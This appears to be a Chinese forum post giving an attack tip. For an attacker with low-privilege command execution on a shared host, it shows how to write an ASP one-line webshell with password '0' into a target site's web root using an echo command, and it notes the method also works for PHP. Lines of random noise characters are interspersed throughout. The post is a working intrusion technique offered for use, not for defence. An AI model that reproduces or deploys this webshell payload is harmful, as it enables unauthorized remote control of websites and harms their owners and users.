在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
. Y; J1 D" ], J) m. s4 y) s5 p" X1 Q) U9 [8 C
命令格式8 Z( B3 k- N/ ?+ d' N
3 M% p& ~0 s$ ?; j: VEcho 语句 >目标站绝对目录+ D& v/ c+ z8 s: ^+ F
- ]( u5 x6 d/ g0 |2 ^$ I
例如: 1 |) `: P' q+ P. P4 w
/ [+ H# `/ P7 ?8 d) ~+ t
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp) R2 Y( h. b4 U) `0 W! m- T
3 W6 x: z. S! d6 s这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
: w- ^- d! e/ w) A5 L4 ]: |; v |